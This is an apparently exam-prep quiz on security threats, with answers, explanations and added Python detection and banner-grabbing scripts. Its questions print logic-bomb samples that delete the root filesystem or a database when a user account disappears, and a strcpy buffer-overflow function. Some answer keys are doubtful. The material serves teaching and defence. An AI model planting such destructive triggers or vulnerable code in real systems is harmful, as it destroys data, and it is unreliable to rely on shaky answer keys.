Quiz A : Threats, Attacks, and Vulnerabilities
Which of the following is an example of resource exhaustion?
A. A penetration tester requests every available IP address from a DHCP server.
Which of the following differentiates a collision attack from a rainbow table attack?
A. A rainbow table attack performs a hash lookup. Explanation/Reference: A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. A collision attack on a cryptographic hash tries to find two inputs producing the same hash value, i.e. a hash collision.
Which of the following enables sniffing attacks against a switched network?
A. ARP poisoning
Which of the following differentiates ARP poisoning from a MAC spoofing attack?
A. ARP poisoning uses unsolicited ARP replies. Explanation/Reference: The basic principle behind ARP spoofing is to exploit the lack of authentication in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN. Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default destination to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?
A. Banner grabbing Explanation/Reference: Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, nmap, zmap and Netcat.
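The banner grab described above, as an added example that is not part of the quiz and not taken from any of the tools it names. It connects with Python's socket module, reads what the service volunteers (sending a HEAD request first for HTTP, which does not speak first), and parses product and version out of the SSH, HTTP, FTP and SMTP banner shapes. The regexes, the product names they recognise and the throwaway localhost listener used as a stand-in for a real service are assumptions made for the demonstration.

```python
import re
import socket
import threading

# Banner shapes for the services named above. The product names in the FTP alternation
# are illustrative; extend them for the software in your own environment (assumption).
BANNER_PATTERNS = [
    ("ssh",  re.compile(r"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_/ ]?(?P<version>[\w.]+)?", re.M)),
    ("http", re.compile(r"^Server:\s*(?P<product>[A-Za-z-]+)/(?P<version>[\w.]+)", re.M | re.I)),
    ("ftp",  re.compile(r"^220[ -].*?(?P<product>vsFTPd|ProFTPD|Pure-FTPd|FileZilla Server)[ /]?(?P<version>[\w.]+)?", re.M)),
    ("smtp", re.compile(r"^220[ -].*?ESMTP\s+(?P<product>\w+)(?:\s+(?P<version>[\w.]+))?", re.M)),
]

# Probes for services that wait for the client to speak first; everything else gets b"".
PROBES = {80: b"HEAD / HTTP/1.0\r\n\r\n", 8080: b"HEAD / HTTP/1.0\r\n\r\n"}


def grab_banner(host, port, timeout=3.0, probe=None):
    """Connect to host:port, optionally send a probe, and return the first chunk the
    service sends. Returns "" on timeout, which is what a service that never speaks
    first looks like when no probe is sent."""
    if probe is None:
        probe = PROBES.get(port, b"")
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            data = s.recv(4096)
    except socket.timeout:
        return ""
    return data.decode("utf-8", errors="replace").strip()


def parse_banner(text):
    """Map a raw banner to {service, product, version, raw}. service is "unknown" when
    no pattern matches; version is None when the banner hides it (e.g. ESMTP Postfix)."""
    for service, pattern in BANNER_PATTERNS:
        m = pattern.search(text)
        if m:
            return {"service": service, "product": m.group("product"),
                    "version": m.group("version"), "raw": text.strip()}
    return {"service": "unknown", "product": None, "version": None, "raw": text.strip()}


def serve_banner(banner):
    """Test fixture, not a real service: a one-shot listener on 127.0.0.1 that sends
    `banner` to the first client and closes. Returns the ephemeral port it chose."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


if __name__ == "__main__":
    port = serve_banner(b"220 (vsFTPd 3.0.3)\r\n")
    print(parse_banner(grab_banner("127.0.0.1", port)))
```

Version strings pulled from banners are self-reported and easy to change, so treat the result as a lead for a credentialed check, not as proof of a vulnerable version.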
A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies the type of penetration testing?
A. Black box
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue?
A. Botnet Explanation/Reference: Botnets can be used to perform distributed denial-of-service attacks (DDoS), steal data, send spam, and allow the attacker to access the device and its connection. The owner controls the botnet using command and control (C&C) software; the off-hours traffic between internal computers and external IPs in the scenario is that C&C channel. The word "botnet" is a combination of the words "robot" and "network". The term is usually used with a negative or malicious connotation.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?
A. Competitor
A recent audit contained significant findings for several servers, including: In the future, which of the following capabilities would enable administrators to detect these issues proactively?
A. Credentialed vulnerability scan
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select Three)
A. Crypto-malware D. Virus E. Ransomware
During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk?
A. Disable Telnet and deploy SSH.
Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?
A. Embedded web server
An information security specialist is reviewing the following output from a Linux server:
user@server:~$ crontab -l
5 * * * * /usr/local/bin/backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep --quiet joeuser /etc/passwd; then
    rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server?
A. Logic bomb Explanation/Reference: The cron entry runs the script at five minutes past every hour. As long as the account joeuser exists in /etc/passwd the script does nothing; the moment that account is removed (for example when the employee leaves), the condition flips and the script deletes the root filesystem. Code that stays dormant until a trigger condition is met is a logic bomb; a real backup script would have no reason to check for a particular user account.
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use?
A. Non-intrusive
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?
A. Passive scan Explanation/Reference: Legacy systems need caution when scanning for vulnerabilities. A vulnerability scan can cause system crashes in older systems.
Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the Windows\CurrentVersion\Run registry key?
A. Persistence Explanation/Reference: Programs listed under HKLM\Software\Microsoft\Windows\CurrentVersion\Run are started at every logon (HKCU\...\Run does the same for a single user), so the malicious file runs again after every reboot or logon without the attacker having to re-exploit the host. That is persistence. These keys are among the first places to check when hunting for it, for example with Sysinternals Autoruns or a registry query.
A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor finds out that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some user to bypass authentication of that application. Which of the following types of malware allows such a compromise to take place? (Select TWO).
A. RAT E. Backdoor Explanation/Reference: A Remote Access Trojan is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software and other anti-virus software.
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
A. RAT Explanation/Reference: See the description of a Remote Access Trojan above. The tell here is that the application, the moment it ran, opened a new port in the listening state: it is waiting for an inbound connection from a remote operator, which is RAT behaviour and not something an MP3 converter needs.
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
  Proto  Local Address        Foreign Address   State
  TCP    0.0.0.0:135          0.0.0.0
   RpcSs
   [svchost.exe]
  TCP    0.0.0.0:445          0.0.0.0
   [svchost.exe]
  TCP    192.168.1.10:5000    10.37.213.20
   winserver.exe
  UDP    192.168.1.10:1900    *.*
   SSDPSVR
Based on the above information, which of the following types of malware was installed on the user's computer?
A. RAT Explanation/Reference: The indicator is not port 5000 by itself but the process that owns the connection. winserver.exe, a binary that arrived with the freeware package and is not a Windows component, holds a connection from the workstation to 10.37.213.20, a host outside the local subnet, on a non-standard port, while the other entries (RPC, SMB, SSDP) are ordinary svchost.exe services. An unknown program maintaining its own remote channel is the signature of a RAT. Note that the -b switch, which reveals the owning executable, needs an elevated prompt, and that a process name alone is weak evidence: confirm by checking the binary's path, signature and hash.
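Added example, not part of the quiz: the triage a responder would script over netstat -nab output of that kind. It parses the records (the owning executable appears on the line after each entry when the prompt is elevated) and flags listeners and connections owned by binaries that are not in a known-good baseline. The sample output, the baseline list, the local subnet and the foreign ports are constructed for the demonstration; the quiz output above shows no port on the foreign address.

```python
import ipaddress
import re

# Constructed netstat -nab output (not the quiz's; ports, states and the extra rows are
# invented so the triage has something to compare). Real output needs an elevated prompt
# for the [owner.exe] lines to appear.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
 [svchost.exe]
  TCP    192.168.1.10:5000      10.37.213.20:6000      ESTABLISHED
 [winserver.exe]
  TCP    192.168.1.10:49710     203.0.113.7:443        ESTABLISHED
 [chrome.exe]
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
 [winserver.exe]
  UDP    192.168.1.10:1900      *:*
  SSDPSRV
 [svchost.exe]
"""

# Baseline of executables expected to own sockets on this workstation (assumption).
KNOWN_GOOD = {"svchost.exe", "chrome.exe", "system", "lsass.exe"}

RECORD = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s*$")
OWNER = re.compile(r"^\s*\[(.+?)\]\s*$")


def parse_netstat(text):
    """Turn netstat -nab output into records; the service-name and [owner.exe] lines
    that follow an entry are attached to that entry."""
    records, current = [], None
    for line in text.splitlines():
        m = RECORD.match(line)
        if m:
            current = {"proto": m.group(1), "local": m.group(2), "foreign": m.group(3),
                       "state": m.group(4), "service": None, "process": None}
            records.append(current)
            continue
        if current is None or not line.strip():
            continue                         # header and blank lines
        m = OWNER.match(line)
        if m:
            current["process"] = m.group(1)
        else:
            current["service"] = line.strip()
    return records


def triage(records, known_good=KNOWN_GOOD, local_net="192.168.1.0/24"):
    """Flag sockets owned by executables outside the baseline: any listener, and any
    established connection to an address off the local subnet."""
    net = ipaddress.ip_network(local_net)
    findings = []
    for r in records:
        proc = (r["process"] or "").lower()
        if proc in known_good:
            continue
        fip = r["foreign"].rpartition(":")[0]
        try:
            off_subnet = ipaddress.ip_address(fip) not in net
        except ValueError:
            off_subnet = False               # "*" and similar placeholders
        if r["state"] == "LISTENING":
            findings.append((proc or "<unknown>", r["local"], "unexpected listener"))
        elif r["state"] == "ESTABLISHED" and off_subnet:
            findings.append((proc or "<unknown>", r["foreign"], "unexpected process with off-subnet connection"))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_netstat(SAMPLE_NETSTAT)):
        print(finding)
```

A name-based baseline is a weak control on its own (malware is happy to call itself svchost.exe), so in practice the process list should be joined against binary paths, signatures or hashes before anything is cleared.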
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?
A. Ransomware Explanation/Reference: Ransomware is a type of malicious software that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem - and difficult to trace digital currencies such as Ukash and cryptocurrency are used for the ransoms, making tracing and prosecuting the perpetrators difficult. Ransomware attacks are typically carried out using a Trojan that is disguised as a legitimate file that the user is tricked into downloading or opening when it arrives as an email attachment. However, one high-profile example, the "WannaCry worm", traveled automatically between computers without user interaction.
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?
A. Remote exploit
A technician suspects that a system has been compromised. The technician reviews the following log entry:
WARNING - hash mismatch: C:\Windows\SysWOW64\user32.dll
WARNING - hash mismatch: C:\Windows\SysWOW64\kernel32.dll
Based solely on the above information, which of the following types of malware is MOST likely installed on the system?
A. Rootkit Explanation/Reference: user32.dll and kernel32.dll are core Windows libraries. File-integrity monitoring reporting that their hashes no longer match the known-good baseline means system files have been replaced or patched in place, and hooking core libraries to hide processes, files and connections is exactly how a user-mode rootkit operates. With no other evidence available, a rootkit is the most likely explanation.
A security analyst is performing pass-the-hash penetration testing. The security analyst has obtained the SAM, Security, and System hives from a compromised system and wants to view password hashes. Given this scenario, which of the following is the first step the security analyst should take?
A. Run a scan on the HKLM\SAM hive in the registry
An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation?
A. Script kiddie Explanation/Reference: A script kiddie is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites.
A user receives an email from the ISP indicating that malicious traffic coming from the user's home network has been detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening?
A. The camera system is infected with a bot.
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).
A. The firewall is disabled on workstations. D. Default administrator credentials exist on networking hardware.
A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform:
A. a gray-box penetration test. Explanation/Reference: There are three testing types: Black box- Tester has no information of systems being tested Gray box- Tester has a limited amount of information of target, such as a block of IP addresses White box- Tester has full knowledge of systems.
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?
A. arp -s 192.168.1.1 00-3a-d1-fa-b1-06 Explanation/Reference: The Address Resolution Protocol (ARP) is a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given internet layer address, typically an IPv4 address. A host resolves an IP address with a broadcast ARP request, and any reply is accepted without authentication. An attacker can take advantage of this by sending a spoofed reply that maps the gateway's IP address to the attacker's MAC. arp -s creates a static entry for 192.168.1.1 in the host's ARP cache, so later spoofed replies for that address are ignored. This protects only that one mapping, normally the default gateway, on the host that runs the script; on current Windows versions arp -s may be refused and the supported equivalent is netsh interface ipv4 add neighbors. The network-wide control is Dynamic ARP Inspection on the switches.
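An added example (not from the quiz) covering both the ARP poisoning mechanics described earlier and the static entry used here. It replays a constructed sequence of ARP requests and replies the way a victim host would process them, pins the gateway mapping the logon script would set, and reports the three tells of a poisoning attempt: a reply nobody asked for, a reply that contradicts the pinned or learned mapping, and one MAC claiming several IPs. It also emits the static-entry commands for a given trusted mapping; the events, the trusted mapping and the interface name passed to netsh are assumptions.

```python
from collections import defaultdict

# Constructed ARP events in capture order (not from any real capture):
# (op, sender_ip, sender_mac, target_ip), op = "request" | "reply".
SAMPLE_EVENTS = [
    ("request", "192.168.1.10", "aa:aa:aa:aa:aa:10", "192.168.1.1"),
    ("reply",   "192.168.1.1",  "00:3a:d1:fa:b1:06", "192.168.1.10"),  # gateway answers
    ("request", "192.168.1.10", "aa:aa:aa:aa:aa:10", "192.168.1.20"),
    ("reply",   "192.168.1.20", "aa:aa:aa:aa:aa:20", "192.168.1.10"),
    ("reply",   "192.168.1.1",  "de:ad:be:ef:00:01", "192.168.1.10"),  # unsolicited, claims the gateway
    ("reply",   "192.168.1.20", "de:ad:be:ef:00:01", "192.168.1.10"),  # same MAC now claims .20 too
]

# The mapping the logon script pins with arp -s (assumed to come from the switch config).
TRUSTED = {"192.168.1.1": "00-3a-d1-fa-b1-06"}


def normalize_mac(mac):
    return mac.lower().replace("-", ":")


def detect_arp_poisoning(events, trusted=None):
    """Process ARP traffic the way a victim's cache would and return alerts as
    (event_index, reason, claimed_ip, claimed_mac). A static (trusted) entry is never
    overwritten, which is exactly what arp -s buys the host."""
    trusted = {ip: normalize_mac(m) for ip, m in (trusted or {}).items()}
    cache = {}                    # ip -> mac learned from replies
    pending = set()               # (asker_ip, asked_ip) requests still awaiting a reply
    ips_by_mac = defaultdict(set)
    alerts = []
    for i, (op, sender_ip, sender_mac, target_ip) in enumerate(events):
        sender_mac = normalize_mac(sender_mac)
        if op == "request":
            pending.add((sender_ip, target_ip))
            continue
        # A reply says "sender_ip is at sender_mac", addressed to target_ip.
        if (target_ip, sender_ip) in pending:
            pending.discard((target_ip, sender_ip))
        else:
            alerts.append((i, "unsolicited reply", sender_ip, sender_mac))
        if sender_ip in trusted and trusted[sender_ip] != sender_mac:
            alerts.append((i, "pinned mapping contradicted", sender_ip, sender_mac))
        elif sender_ip in cache and cache[sender_ip] != sender_mac:
            alerts.append((i, "mapping changed", sender_ip, sender_mac))
        ips_by_mac[sender_mac].add(sender_ip)
        if len(ips_by_mac[sender_mac]) > 1:
            alerts.append((i, "one MAC claims multiple IPs", sender_ip, sender_mac))
        if sender_ip not in trusted:
            cache[sender_ip] = sender_mac
    return alerts


def static_entry_commands(trusted, interface="Ethernet"):
    """Commands for the logon script. arp -s is the classic form; on current Windows it
    may be refused and netsh is the supported equivalent. Interface name is an assumption."""
    cmds = []
    for ip, mac in trusted.items():
        win_mac = mac.lower().replace(":", "-")
        cmds.append(f"arp -s {ip} {win_mac}")
        cmds.append(f'netsh interface ipv4 add neighbors "{interface}" {ip} {win_mac}')
    return cmds


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_EVENTS, TRUSTED):
        print(alert)
    print("\n".join(static_entry_commands(TRUSTED)))
```

Gratuitous ARP is legitimately used by hosts announcing themselves and by failover setups, so the "unsolicited reply" signal alone produces false positives; the combination with a contradicted pinned mapping or one MAC owning several addresses is what warrants a response.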
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code:
#include <string.h>
void foo(char *bar)
{
    char random_user_input[12];
    strcpy(random_user_input, bar);
}
Which of the following vulnerabilities is present?
B. Buffer overflow Explanation/Reference: strcpy copies until it reaches the terminating NUL of bar and never checks the size of the destination, so any argument of 12 or more characters writes past the end of the 12-byte stack buffer and over whatever follows it (saved registers, the return address). The fix is a bounded copy, for example snprintf(random_user_input, sizeof random_user_input, "%s", bar), or rejecting over-length input before copying. This example can be found on Wikipedia at https://en.wikipedia.org/wiki/Buffer_overflow
A security analyst monitors the syslog server and notices the following:
Pinging 10.25.27.31 with 65500 bytes of data:
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Reply from 10.25.27.31: bytes=65500 time<1ms TTL=128
Which of the following attacks is occurring?
B. Buffer overflow Explanation/Reference: A ping of death is an attack that sends a malformed or oversized ICMP echo request to a computer. An IP packet cannot exceed 65,535 bytes, so an oversized ping has to be fragmented; when the target reassembles the fragments into a packet larger than that, a buffer overflow can occur, causing a system crash and potentially allowing the injection of malicious code. 65500 bytes is the largest payload the Windows ping -l switch accepts. Current operating systems reject such reassembly, so today a sustained stream of maximum-size pings like this one is more likely an attempt at bandwidth or resource exhaustion than a working ping of death.
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur?
B. Credential harvesting
During a routine review of firewall log reports, a security technician notices multiple successful logins for the admin user during unusual hours. The technician contacts the network administrator, who confirms the logins were not related to the administrator's activities. Which of the following is the MOST likely reason for these logins?
B. Default credentials were still in place. Explanation/Reference: A Default Credential vulnerability is a type of vulnerability that is most commonly found to affect the devices like modems, routers, digital cameras, and other devices having some pre-set (default) administrative credentials to access all configuration settings. The vendor or manufacturer of such devices uses a single predefined set of admin credentials to access the device configurations, and any potential hacker can misuse this fact to hack such devices, if those credentials are not changed by the consumers.
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?
B. Disable NTLM Explanation/Reference: In cryptanalysis and computer security, pass the hash is a technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case. NTLM (NT LAN Manager) is Microsoft's old authentication protocol, replaced by Kerberos as the default starting with Windows 2000. The NT hash is unsalted MD4 of the password, so identical passwords produce identical hashes, and the hash held in the SAM or in LSASS memory is a password equivalent: in the NTLM challenge-response exchange the client proves knowledge of the hash, not of the password, which is exactly what pass the hash exploits. A captured challenge-response can additionally be cracked offline. Disabling NTLM removes the protocol that accepts the hash, but it breaks anything that cannot use Kerberos, so audit NTLM use first (the Network security: Restrict NTLM audit policies) and combine it with controls that limit hash exposure, such as the Protected Users group, Credential Guard and unique local administrator passwords (LAPS).
A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved? (Select TWO)
B. DoS attack E. Resource exhaustion
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?
B. Gray box Explanation/Reference: See the three testing types described above. Being handed password hashes, and nothing else, is partial knowledge of the target, which makes this a gray-box test.
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?
B. Insiders Explanation/Reference: An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization's security practices, data and computer systems. The threat may involve fraud, the theft of confidential or commercially valuable information, the theft of intellectual property, or the sabotage of computer systems. The insider threat comes in three categories: 1) malicious insiders, which are people who take advantage of their access to inflict harm on an organization; 2) negligent insiders, which are people who make errors and disregard policies, which place their organizations at risk; and 3) infiltrators, who are external actors that obtain legitimate access credentials without authorization.
An organization's IT department announced plans to update workstation operating systems to the latest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate?
B. Lack of vendor support on the version currently in use
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)
B. Non-applicable plug-ins were selected in the scan policy D. The output of the report contains false positives
Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan?
B. Outdated software versions on the host Explanation/Reference: A credentialed scan logs in to the host with a supplied account and inspects it from the inside: installed packages and patch levels, file and user permissions, registry values and local configuration. A non-credentialed scan sees only what the host exposes on the network and has to infer versions from banners and behaviour. Because it works from an authorised login rather than by probing, the credentialed scan is also less likely to disturb the target.
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?
B. Passive scan Explanation/Reference: Passive scanning is a method of vulnerability detection that relies on information gleaned from network data that is captured from a target computer without direct interaction. Packet sniffing applications can be used for passive scanning to reveal information such as operating system, known protocols running on non-standard ports and active network applications with known bugs. Passive scanning may be conducted by a network administrator scanning for security vulnerabilities or by an intruder as a preliminary to an active attack. For an intruder, passive scanning's main advantage is that it does not leave a trail that could alert users or administrators to their activities. For an administrator, the main advantage is that it doesn't risk causing undesired behavior on the target computer, such as freezes. Because of these advantages, passive scanning need not be limited to a narrow time frame to minimize risk or disruption, which means that it is likely to return more information. Passive scanning does have limitations. It is not as complete in detail as active vulnerability scanning and cannot detect any applications that are not currently sending out traffic; nor can it distinguish false information put out for obfuscation.
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host?
B. Pivoting Explanation/Reference: Pivoting refers to a method used by penetration testers that uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations, which may prohibit direct access to all machines. For example, if an attacker compromises a web server on a corporate network, the attacker can then use the compromised web server to attack other systems on the network.
A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware's binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment?
B. Polymorphic worm
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?
B. Rootkit Explanation/Reference: Modern rootkits do not elevate access, but rather are used to make another software payload undetectable by adding stealth capabilities. Most rootkits are classified as malware, because the payloads they are bundled with are malicious. For example, a payload might covertly steal user passwords, credit card information, computing resources, or conduct other unauthorized activities. A small number of rootkits may be considered utility applications by their users: for example, a rootkit might cloak a CD-ROM-emulation driver, allowing video game users to defeat anti-piracy measures that require insertion of the original installation media into a physical optical drive to verify that the software was legitimately purchased.
Rootkits and their payloads have many uses:
- Provide an attacker with full access via a backdoor, permitting unauthorized access to, for example, steal or falsify documents. One of the ways to carry this out is to subvert the login mechanism, such as the /bin/login program on Unix-like systems or GINA on Windows. The replacement appears to function normally, but also accepts a secret login combination that allows an attacker direct access to the system with administrative privileges, bypassing standard authentication and authorization mechanisms.
- Conceal other malware, notably password-stealing key loggers and computer viruses.
- Appropriate the compromised machine as a zombie computer for attacks on other computers. (The attack originates from the compromised system or network, instead of the attacker's system.) "Zombie" computers are typically members of large botnets that can launch denial-of-service attacks, distribute e-mail spam, conduct click fraud, etc.
- Enforcement of digital rights management (DRM).
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?
B. Spoofing Explanation/Reference: Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message, and are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.
Emails containing the URL of a popular technology forum were sent from an external source to a research and development company. When users at the company load the page, malware infects their system. Which of the following BEST describes this scenario?
B. The email is intended to bait users into accessing a watering hole.
Which of the following are considered among the BEST indicators that a received message is a hoax? (SELECT 2)
B. Warnings of monetary loss to the receiver D. Claims of possible damage to computer hardware
A public announcement is made about a newly discovered, rapidly spreading virus. The security team immediately updates and applies all its antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that the signature update is not available for this virus yet. Which of the following BEST describes this situation?
B. Zero day Explanation/Reference: Zero day means the malware is using a software vulnerability for which there is currently no available defense or fix
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?
B. Injection
A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?
C. Active reconnaissance
While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing 20 minutes, a full screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be blocked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager holds down the power button to turn off the laptop and then powers it back on, which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing?
C. Adware
A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)
C. Block access to personal email on corporate systems E. Update corporate policy to prohibit access to social media websites
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?
C. Buffer overflow Explanation/Reference: A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes.
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed?
C. Credentialed Explanation/Reference: A vulnerability scan can be run credentialed or non-credentialed. A non-credentialed scan is the easiest and quickest; it reports back only what is reachable over the network, such as open services. A credentialed scan goes further by logging in to the target with a set of credentials supplied before the scan and reading files, versions and registry values locally. It requires an accurate, properly scoped set of credentials, but gives a far better picture of what an attacker who already holds an account could reach.
An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all the file names were changed to some random names. Which of the following BEST represents what compromised the machine?
C. Crypto-malware
An auditor confirms the risk associated with a Windows-specific vulnerability, which was discovered by the company's security tool, does not apply due to the server running a Linux OS. Which of the following does this BEST describe?
C. False positive
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?
C. Impersonation
A security manager discovers the most recent vulnerability scan report illustrates low-level non-critical findings. Which of the following scanning concepts would BEST report critical threats?
C. Intrusive scan
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:
$members = Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object -ExpandProperty name
if ($members -notcontains "JohnDoe") {
    Remove-Item -Path C:\Database -Recurse -Force
}
